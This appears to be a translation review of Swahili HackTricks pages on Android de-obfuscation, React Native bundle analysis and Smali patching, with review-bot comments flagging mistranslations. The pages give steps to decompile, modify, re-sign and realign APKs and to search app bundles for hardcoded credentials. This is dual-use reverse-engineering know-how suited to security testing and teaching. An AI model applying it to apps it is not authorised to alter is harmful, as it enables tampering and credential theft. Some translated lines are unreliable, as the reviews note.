* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Mbinu za **Kuondoa Ufichaji kwa Mikono**
## Manual **De-obfuscation Techniques**
Katika uwanja wa **usalama wa programu**, mchakato wa kufanya nambari iliyofichwa iwezeeleweka, unaojulikana kama **kuondoa ufichaji**, ni muhimu. Mwongozo huu unachunguza mikakati mbalimbali ya kuondoa ufichaji, ikilenga mbinu za uchambuzi wa tuli na kutambua mifano ya ufichaji. Aidha, inawasilisha zoezi la matumizi ya vitendo na inapendekeza rasilimali zaidi kwa wale wanaopenda kuchunguza mada za juu zaidi.
Katika eneo la **usalama wa programu**, mchakato wa kufanya msimbo uliofichwa kueleweka, unaojulikana kama **de-obfuscation**, ni muhimu. Mwongo huu unachunguza mikakati mbalimbali za de-obfuscation, ukizingatia mbinu za uchambuzi wa statiki na kutambua mifumo ya obfuscation. Aidha, inatoa zoezi la matumizi ya vitendo na inapendekeza rasilimali zaidi kwa wale wanaopenda kuchunguza mada za juu zaidi.
### Mikakati ya Uchambuzi wa Tuli wa Kuondoa Ufichaji
### **Strategies for Static De-obfuscation**
Wakati unashughulika na **nambari iliyofichwa**, mikakati kadhaa inaweza kutumika kulingana na asili ya ufichaji:
Wakati wa kushughulika na **obfuscated code**, mikakati kadhaa inaweza kutumika kulingana na asili ya obfuscation:
- **Nambari ya DEX (Java)**: Njia moja yenye ufanisi ni kutambua njia za kuondoa ufichaji za programu, kisha kuiga njia hizi katika faili ya Java. Faili hii inatekelezwa ili kurejesha ufichaji kwenye vipengele vilivyolengwa.
- **Nambari ya Java na Nambari ya Asili**: Njia nyingine ni kutafsiri algorithm ya kuondoa ufichaji katika lugha ya skrini kama Python. Mkakati huu unasisitiza kwamba lengo kuu si kuelewa kabisa algorithm lakini kuitekeleza kwa ufanisi.
- **DEX bytecode (Java)**: Njia moja yenye ufanisi ni kutambua mbinu za de-obfuscation za programu, kisha kuiga mbinu hizi katika faili la Java. Faili hii inatekelezwa ili kubadilisha obfuscation kwenye vipengele vilivyokusudiwa.
- **Java na Msimbo wa Asili**: Njia nyingine ni kutafsiri algorithimu ya de-obfuscation kuwa lugha ya skripti kama Python. Mikakati hii inaonyesha kwamba lengo kuu si kuelewa kabisa algorithimu bali kuitekeleza kwa ufanisi.
### Kutambua Ufichaji
### **Identifying Obfuscation**
Kutambua nambari iliyofichwa ni hatua ya kwanza katika mchakato wa kuondoa ufichaji. Ishara muhimu ni pamoja na:
Kutambua msimbo uliofichwa ni hatua ya kwanza katika mchakato wa de-obfuscation. Viashiria muhimu ni pamoja na:
- **Kutokuwepo au kuchanganyikiwa kwa herufi** katika Java na Android, ambayo inaweza kuashiria ufichaji wa herufi.
- **Kuwepo kwa faili za binary** katika saraka ya mali au wito wa `DexClassLoader`, unaonyesha kufungua na kupakia nambari kwa njia ya kudumu.
- Matumizi ya **maktaba za asili pamoja na kazi za JNI zisizoweza kutambulika**, zinazoashiria ufichaji wa njia za asili.
- **ukosefu au kuchanganya kwa nyuzi** katika Java na Android, ambayo inaweza kuashiria obfuscation ya nyuzi.
- **uwepo wa faili za binary** katika saraka ya mali au wito kwa `DexClassLoader`, ukionyesha unpacking ya msimbo na upakiaji wa dynamic.
- Matumizi ya **maktaba za asili pamoja na kazi za JNI zisizoweza kutambulika**, zikionyesha uwezekano wa obfuscation ya mbinu za asili.
## Uchambuzi wa Tuli katika Kuondoa Ufichaji
## **Dynamic Analysis in De-obfuscation**
Kwa kutekeleza nambari katika mazingira yaliyodhibitiwa, uchambuzi wa tuli **kuruhusu uchunguzi wa jinsi nambari iliyofichwa inavyotenda wakati halisi**. Mbinu hii ni muhimu sana katika kugundua jinsi mifumo ya ufichaji ngumu iliyoundwa kuficha nia halisi ya nambari inavyofanya kazi.
Kwa kutekeleza msimbo katika mazingira yaliyodhibitiwa, uchambuzi wa dynamic **unaruhusu kuangalia jinsi msimbo uliofichwa unavyofanya kazi kwa wakati halisi**. Njia hii ni yenye ufanisi hasa katika kufichua kazi za ndani za mifumo tata ya obfuscation ambayo imeundwa kuficha nia halisi ya msimbo.
### Matumizi ya Uchambuzi wa Tuli
### **Applications of Dynamic Analysis**
- **Ufichuaji wa Wakati wa Uendeshaji**: Mbinu nyingi za ufichaji zinahusisha kusimbua herufi au sehemu za nambari ambazo zinafichuliwa tu wakati wa uendeshaji. Kupitia uchambuzi wa tuli, vipengele hivi vilivyofichwa vinaweza kukamatwa wakati wa ufichuaji, kufunua umbo lao halisi.
- **Kutambua Mbinu za Ufichaji**: Kwa kufuatilia tabia ya programu, uchambuzi wa tuli unaweza kusaidia kutambua mbinu maalum za ufichaji zinazotumiwa, kama vile utekelezaji wa nambari kwa njia ya kubadilisha, pakiti, au kizazi cha nambari kwa njia ya kudumu.
- **Kugundua Utendaji Uliofichwa**: Nambari iliyofichwa inaweza kuwa na utendaji uliofichwa ambao haueleweki kupitia uchambuzi wa tuli pekee. Uchambuzi wa tuli unaruhusu uchunguzi wa njia zote za nambari, pamoja na zile zinazotekelezwa kwa masharti, ili kugundua utendaji uliofichwa kama huo.
- **Runtime Decryption**: Mbinu nyingi za obfuscation zinajumuisha kuandika nyuzi au sehemu za msimbo ambazo zinafichwa tu wakati wa utekelezaji. Kupitia uchambuzi wa dynamic, vipengele hivi vilivyoandikwa vinaweza kukamatwa wakati wa ufichuzi, vikifunua sura zao halisi.
- **Identifying Obfuscation Techniques**: Kwa kufuatilia tabia ya programu, uchambuzi wa dynamic unaweza kusaidia kutambua mbinu maalum za obfuscation zinazotumika, kama vile virtualization ya msimbo, packers, au uzalishaji wa msimbo wa dynamic.
- **Uncovering Hidden Functionality**: Msimbo uliofichwa unaweza kuwa na kazi zilizofichwa ambazo hazionekani kupitia uchambuzi wa statiki pekee. Uchambuzi wa dynamic unaruhusu kuangalia njia zote za msimbo, ikiwa ni pamoja na zile zinazotekelezwa kwa masharti, ili kufichua kazi hizo zilizofichwa.
## Marejeo na Kusoma Zaidi
## References and Further Reading
* [https://maddiestone.github.io/AndroidAppRE/obfuscation.html](https://maddiestone.github.io/AndroidAppRE/obfuscation.html)
* BlackHat USA 2018: "Unpacking the Packed Unpacker: Reverse Engineering an Android Anti-Analysis Library" \[[video](https://www.youtube.com/watch?v=s0Tqi7fuOSU)]
* Mazungumzo haya yanajadili mbinu za kuondoa ufichaji, hasa katika nambari ya asili ya Java, ambayo maktaba ya Android ya kudukua ilikuwa ikitumia kuficha tabia yake.
* REcon 2019: "The Path to the Payload: Android Edition" \[[video](https://recon.cx/media-archive/2019/Session.005.Maddie_Stone.The_path_to_the_payload_Android_Edition-J3ZnNl2GYjEfa.mp4)]
* Mazungumzo haya yanajadili mfululizo wa mbinu za ufichaji, kwa kutumia nambari ya Java pekee, ambazo botnet ya Android ilikuwa ikitumia kuficha tabia yake.
* BlackHat USA 2018: “Unpacking the Packed Unpacker: Reverse Engineering an Android Anti-Analysis Library” \[[video](https://www.youtube.com/watch?v=s0Tqi7fuOSU)]
* Hotuba hii inazungumzia uhandisi wa nyuma wa moja ya maktaba za asili za anti-analysis ngumu zaidi nilizoshuhudia zikitumika na programu ya Android. Inashughulikia hasa mbinu za obfuscation katika msimbo wa asili.
* REcon 2019: “The Path to the Payload: Android Edition” \[[video](https://recon.cx/media-archive/2019/Session.005.Maddie_Stone.The_path_to_the_payload_Android_Edition-J3ZnNl2GYjEfa.mp4)]
* Hotuba hii inajadili mfululizo wa mbinu za obfuscation, pekee katika msimbo wa Java, ambazo botnet ya Android ilikuwa ikitumia kuficha tabia yake.
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
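Review bot: the new `- **Runtime Decryption**` bullet renders "encrypting strings" as `kuandika nyuzi` ("writing strings") and "encrypted components" as `vipengele hivi vilivyoandikwa` ("these written components"), which loses the point of the bullet; `kusimba nyuzi` and `vipengele vilivyosimbwa` would keep the encryption sense. Two smaller wording points in the same hunk: `Mwongo huu` in the opening paragraph should be `Mwongozo huu` (guide), and the `- **DEX bytecode (Java)**` bullet's `kubadilisha obfuscation` ("change the obfuscation") should say the obfuscation is removed or undone (`kuondoa obfuscation`). Separately, the section headings (`Strategies for Static De-obfuscation`, `Identifying Obfuscation`, `Applications of Dynamic Analysis`, `References and Further Reading`) are left in English while their bodies are translated; either translate them or state that headings are intentionally kept in English.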

View file

@ -1,62 +1,64 @@
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
# Uchambuzi wa Programu ya React Native
Ili kuthibitisha ikiwa programu imejengwa kwa mfumo wa React Native, fuata hatua hizi:
Ili kuthibitisha kama programu ilijengwa kwenye mfumo wa React Native, fuata hatua hizi:
1. Badilisha jina la faili ya APK na kurefusha kuwa zip na kuitoa kwenye folda mpya kwa kutumia amri `cp com.example.apk example-apk.zip` na `unzip -qq example-apk.zip -d ReactNative`.
1. Badilisha jina la faili la APK kwa kiambishi cha zip na uondoe kwenye folda mpya kwa kutumia amri `cp com.example.apk example-apk.zip` na `unzip -qq example-apk.zip -d ReactNative`.
2. Nenda kwenye folda ya ReactNative iliyoundwa na tafuta folda ya mali. Ndani ya folda hii, unapaswa kupata faili `index.android.bundle`, ambayo ina JavaScript ya React iliyopunguzwa kwa muundo mdogo.
2. Tembea kwenye folda mpya iliyoundwa ya ReactNative na pata folda ya mali. Ndani ya folda hii, unapaswa kupata faili `index.android.bundle`, ambayo ina JavaScript ya React katika muundo wa minified.
3. Tumia amri `find . -print | grep -i ".bundle$"` kutafuta faili ya JavaScript.
3. Tumia amri `find . -print | grep -i ".bundle$"` kutafuta faili la JavaScript.
Ili kuchambua zaidi nambari ya JavaScript, tengeneza faili iitwayo `index.html` kwenye saraka hiyo hiyo na nambari ifuatayo:
Ili kuchambua zaidi msimbo wa JavaScript, tengeneza faili lililo na jina `index.html` katika saraka hiyo hiyo lenye msimbo ufuatao:
```html
<script src="./index.android.bundle"></script>
```
Unaweza kupakia faili kwenye [https://spaceraccoon.github.io/webpack-exploder/](https://spaceraccoon.github.io/webpack-exploder/) au fuata hatua hizi:
You can upload the file to [https://spaceraccoon.github.io/webpack-exploder/](https://spaceraccoon.github.io/webpack-exploder/) or follow these steps:
1. Fungua faili ya `index.html` kwenye Google Chrome.
1. Fungua faili la `index.html` katika Google Chrome.
2. Fungua Jopo la Watengenezaji kwa kubonyeza **Command+Option+J kwa OS X** au **Control+Shift+J kwa Windows**.
2. Fungua Developer Toolbar kwa kubonyeza **Command+Option+J kwa OS X** au **Control+Shift+J kwa Windows**.
3. Bonyeza "Sources" kwenye Jopo la Watengenezaji. Unapaswa kuona faili ya JavaScript iliyogawanyika katika folda na faili, ambazo zinaunda pakiti kuu.
3. Bonyeza "Sources" katika Developer Toolbar. Unapaswa kuona faili la JavaScript ambalo limegawanywa katika folda na faili, likiunda bundle kuu.
Ikiwa utapata faili inayoitwa `index.android.bundle.map`, utaweza kuchambua nambari ya chanzo katika muundo usiofupishwa. Faili za ramani zina habari za kufuatilia chanzo, ambazo zinaruhusu kuweka alama vitambulisho vilivyofupishwa.
If you find a file called `index.android.bundle.map`, you will be able to analyze the source code in an unminified format. Map files contain source mapping, which allows you to map minified identifiers.
Kutafuta vitambulisho na sehemu nyeti, fuata hatua hizi:
To search for sensitive credentials and endpoints, follow these steps:
1. Tambua maneno muhimu ya kutathmini nambari ya JavaScript. Programu za React Native mara nyingi hutumia huduma za watu wa tatu kama vile Firebase, AWS S3, funguo za faragha, nk.
1. Tambua maneno muhimu nyeti ili kuchambua msimbo wa JavaScript. Programu za React Native mara nyingi hutumia huduma za watu wengine kama Firebase, AWS S3 service endpoints, funguo za kibinafsi, n.k.
2. Katika kesi hii maalum, iligundulika kuwa programu ilikuwa ikatumia huduma ya Dialogflow. Tafuta muundo unaohusiana na usanidi wake.
2. Katika kesi hii maalum, programu ilionekana ikitumia huduma ya Dialogflow. Tafuta muundo unaohusiana na usanidi wake.
3. Ilikuwa bahati kwamba vitambulisho nyeti vilivyofungwa kwa nguvu vilipatikana katika nambari ya JavaScript wakati wa mchakato wa uchunguzi.
3. Ilikuwa na bahati kwamba akreditif nyeti zilizowekwa kwa mikono zilipatikana katika msimbo wa JavaScript wakati wa mchakato wa recon.
## Marejeo
## References
* [https://medium.com/bugbountywriteup/lets-know-how-i-have-explored-the-buried-secrets-in-react-native-application-6236728198f7](https://medium.com/bugbountywriteup/lets-know-how-i-have-explored-the-buried-secrets-in-react-native-application-6236728198f7)
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au **kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
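Review bot: step 1 of the new text (`Badilisha jina la faili la APK kwa kiambishi cha zip na uondoe kwenye folda mpya`) uses `uondoe` ("remove it"), which does not describe what `unzip -qq example-apk.zip -d ReactNative` does; the old wording `kuitoa` (extract it) was correct and should be kept. Several paragraphs in this hunk are also left untranslated in an otherwise Swahili page: the `You can upload the file to ...` line, the `If you find a file called index.android.bundle.map` paragraph, the `To search for sensitive credentials and endpoints` line and the `## References` heading. Either translate them or note that they are intentionally English.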

View file

@ -1,97 +1,98 @@
# Smali - Kudecompile/\[Kubadilisha]/Kukusanya
# Smali - Decompiling/\[Modifying]/Compiling
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
Marafiki, mara nyingine inakuwa ya kuvutia kubadilisha nambari ya programu ili kupata habari iliyofichwa kwako (labda nywila zilizofichwa vizuri au bendera). Kwa hivyo, inaweza kuwa ya kuvutia kudecompile apk, kubadilisha nambari na kuijumuisha tena.
Wakati mwingine ni ya kuvutia kubadilisha msimbo wa programu ili kupata habari zilizofichwa kwako (labda nywila au bendera zilizofichwa vizuri). Kisha, inaweza kuwa ya kuvutia decompile apk, kubadilisha msimbo na kuirekebisha.
**Marejeleo ya Opcodes:** [http://pallergabor.uw.hu/androidblog/dalvik\_opcodes.html](http://pallergabor.uw.hu/androidblog/dalvik\_opcodes.html)
**Opcodes reference:** [http://pallergabor.uw.hu/androidblog/dalvik\_opcodes.html](http://pallergabor.uw.hu/androidblog/dalvik\_opcodes.html)
## Njia ya Haraka
## Fast Way
Kwa kutumia **Visual Studio Code** na kifaa cha [APKLab](https://github.com/APKLab/APKLab), unaweza **kudecompile kiotomatiki**, kubadilisha, **kukusanya**, saini na kusakinisha programu bila kutekeleza amri yoyote.
Kwa kutumia **Visual Studio Code** na kiendelezi cha [APKLab](https://github.com/APKLab/APKLab), unaweza **decompile kiotomatiki**, kubadilisha, **kuirekebisha**, kusaini na kufunga programu bila kutekeleza amri yoyote.
Script nyingine inayofanikisha sana kazi hii ni [**https://github.com/ax/apk.sh**](https://github.com/ax/apk.sh)
**Script** nyingine inayorahisisha kazi hii sana ni [**https://github.com/ax/apk.sh**](https://github.com/ax/apk.sh)
## Kudecompile APK
## Decompile the APK
Kwa kutumia APKTool unaweza kupata **nambari ya smali na rasilimali**:
Kwa kutumia APKTool unaweza kufikia **smali code and resources**:
```bash
apktool d APP.apk
```
Ikiwa **apktool** inakupa kosa lolote, jaribu [kusanikisha **toleo jipya zaidi**](https://ibotpeaches.github.io/Apktool/install/)
Baadhi ya **faili za kuvutia unazopaswa kutazama ni**:
Baadhi ya **faili za kuvutia unapaswa kuangalia ni**:
* _res/values/strings.xml_ (na xml zote ndani ya res/values/\*)
* _AndroidManifest.xml_
* Faili yoyote yenye kipengee cha _.sqlite_ au _.db_
* Faili yoyote yenye kiendelezi _.sqlite_ au _.db_
Ikiwa `apktool` ina **matatizo ya kudekodea programu**, angalia [https://ibotpeaches.github.io/Apktool/documentation/#framework-files](https://ibotpeaches.github.io/Apktool/documentation/#framework-files) au jaribu kutumia hoja ya **`-r`** (Usikodee rasilimali). Kisha, ikiwa tatizo lilikuwa kwenye rasilimali na sio kwenye nambari ya chanzo, hautakuwa na tatizo hilo (pia hautakodea rasilimali).
Ikiwa `apktool` ina **shida katika kufungua programu** angalia [https://ibotpeaches.github.io/Apktool/documentation/#framework-files](https://ibotpeaches.github.io/Apktool/documentation/#framework-files) au jaribu kutumia hoja **`-r`** (Usifungue rasilimali). Kisha, ikiwa shida ilikuwa katika rasilimali na si katika msimbo wa chanzo, hutakuwa na shida hiyo (hutaweza pia kufungua rasilimali).
## Badilisha nambari ya smali
## Badilisha msimbo wa smali
Unaweza **kubadilisha** **maagizo**, kubadilisha **thamani** ya baadhi ya variables au **kuongeza** maagizo mapya. Mimi hubadilisha nambari ya Smali kwa kutumia [**VS Code**](https://code.visualstudio.com), kisha unasakinisha **smalise extension** na mhariri utakuambia ikiwa kuna **maagizo yoyote yasiyo sahihi**.\
Baadhi ya **mifano** inaweza kupatikana hapa:
Unaweza **kubadilisha** **maagizo**, kubadilisha **thamani** ya baadhi ya mabadiliko au **kuongeza** maagizo mapya. Ninabadilisha msimbo wa Smali kwa kutumia [**VS Code**](https://code.visualstudio.com), kisha unafunga **smalise extension** na mhariri atakuambia ikiwa kuna **agizo lolote lililo sahihi**.\
Baadhi ya **mfano** yanaweza kupatikana hapa:
* [Mifano ya mabadiliko ya Smali](smali-changes.md)
* [Google CTF 2018 - Shall We Play a Game?](google-ctf-2018-shall-we-play-a-game.md)
* [Google CTF 2018 - Je, Tutacheza Mchezo?](google-ctf-2018-shall-we-play-a-game.md)
Au unaweza [**angalia hapa chini maelezo ya mabadiliko ya Smali**](smali-changes.md#modifying-smali).
Au unaweza [**kuangalia hapa chini baadhi ya mabadiliko ya Smali yaliyoelezewa**](smali-changes.md#modifying-smali).
## Kurejesha tena APK
## Recompile APK
Baada ya kubadilisha nambari, unaweza **kurejesha** nambari kwa kutumia:
Baada ya kubadilisha msimbo unaweza **kurekebisha** msimbo kwa kutumia:
```bash
apktool b . #In the folder generated when you decompiled the application
```
Itakuwa **kuchakata** APK mpya **ndani** ya folda ya _**dist**_.
It will **compile** the new APK **inside** the _**dist**_ folder.
Ikiwa **apktool** inatoa **kosa**, jaribu [kufunga **toleo jipya**](https://ibotpeaches.github.io/Apktool/install/)
If **apktool** throws an **error**, try[ installing the **latest version**](https://ibotpeaches.github.io/Apktool/install/)
### **Saini APK mpya**
### **Sign the new APK**
Kisha, unahitaji **kuzalisha ufunguo** (utaulizwa nenosiri na habari ambayo unaweza kujaza kwa nasibu):
Then, you need to **generate a key** (you will be asked for a password and for some information that you can fill randomly):
```bash
keytool -genkey -v -keystore key.jks -keyalg RSA -keysize 2048 -validity 10000 -alias <your-alias>
```
Hatimaye, **saini** APK mpya:
Hatimaye, **sign** APK mpya:
```bash
jarsigner -keystore key.jks path/to/dist/* <your-alias>
```
### Kuboresha programu mpya
### Optimize new application
**zipalign** ni zana ya kusawazisha nyaraka ambayo hutoa uboreshaji muhimu kwa faili za programu za Android (APK). [Maelezo zaidi hapa](https://developer.android.com/studio/command-line/zipalign).
**zipalign** ni chombo cha kuoanisha archive ambacho kinatoa uboreshaji muhimu kwa faili za programu za Android (APK). [More information here](https://developer.android.com/studio/command-line/zipalign).
```bash
zipalign [-f] [-v] <alignment> infile.apk outfile.apk
zipalign -v 4 infile.apk
```
### **Saini APK mpya (tena?)**
Ikiwa **unapendelea** kutumia [**apksigner**](https://developer.android.com/studio/command-line/) badala ya jarsigner, **unapaswa kusaini apk** baada ya kufanya **uboreshaji na** zipaling. LAKINI KUMBUKA KUWA UNAHITAJI **KUSAJILI KIUNGANISHI MARA MOJA** NA jarsigner (kabla ya zipalign) AU NA aspsigner (baada ya zipaling).
Ikiwa unataka kutumia [**apksigner**](https://developer.android.com/studio/command-line/) badala ya jarsigner, **unapaswa kusaini apk** baada ya kutumia **ukandamizaji na** zipalign. LAKINI KUMBUKA KWAMBA UNAPASWA **KUSAINI PROGRAMU KIMOJA TU** KWA jarsigner (kabla ya zipalign) AU KWA aspsigner (baada ya zipalign).
```bash
apksigner sign --ks key.jks ./dist/mycompiled.apk
```
## Kubadilisha Smali
Kwa msimbo wa Java wa Hello World ufuatao:
Kwa msimbo wa Hello World Java ufuatao:
```java
public static void printHelloWorld() {
System.out.println("Hello World")
}
```
Msimbo wa Smali ungekuwa:
Msimbo wa Smali utakuwa:
```java
.method public static printHelloWorld()V
.registers 2
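Review bot: the new sentence under `## Badilisha msimbo wa smali` ends with `mhariri atakuambia ikiwa kuna agizo lolote lililo sahihi` ("the editor will tell you if there is any correct instruction"), which inverts the meaning; it should read `lisilo sahihi` (incorrect), as the old line's `yasiyo sahihi` did. Related wording in the same hunk: `kuirekebisha` / `kurekebisha` ("fix it") is used for recompile/rebuild in the intro, in the APKLab sentence and under `## Recompile APK`, while the command described is `apktool b`; `kujenga upya` (rebuild) or simply `recompile` would be clearer. In the apksigner paragraph, `ukandamizaji` (compression) is used for zipalign, which aligns rather than compresses (the zipalign paragraph above it correctly says `kuoanisha`), and `aspsigner` is a typo for `apksigner` carried over from the old line. Two code points not changed by this commit but visible here: `System.out.println("Hello World")` is missing its semicolon, and the fence holding the Smali `.method public static printHelloWorld()V` block is tagged `java` rather than `smali`.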
@ -101,13 +102,13 @@ invoke-virtual {v0,v1}, Ljava/io/PrintStream;->println(Ljava/lang/String;)V
return-void
.end method
```
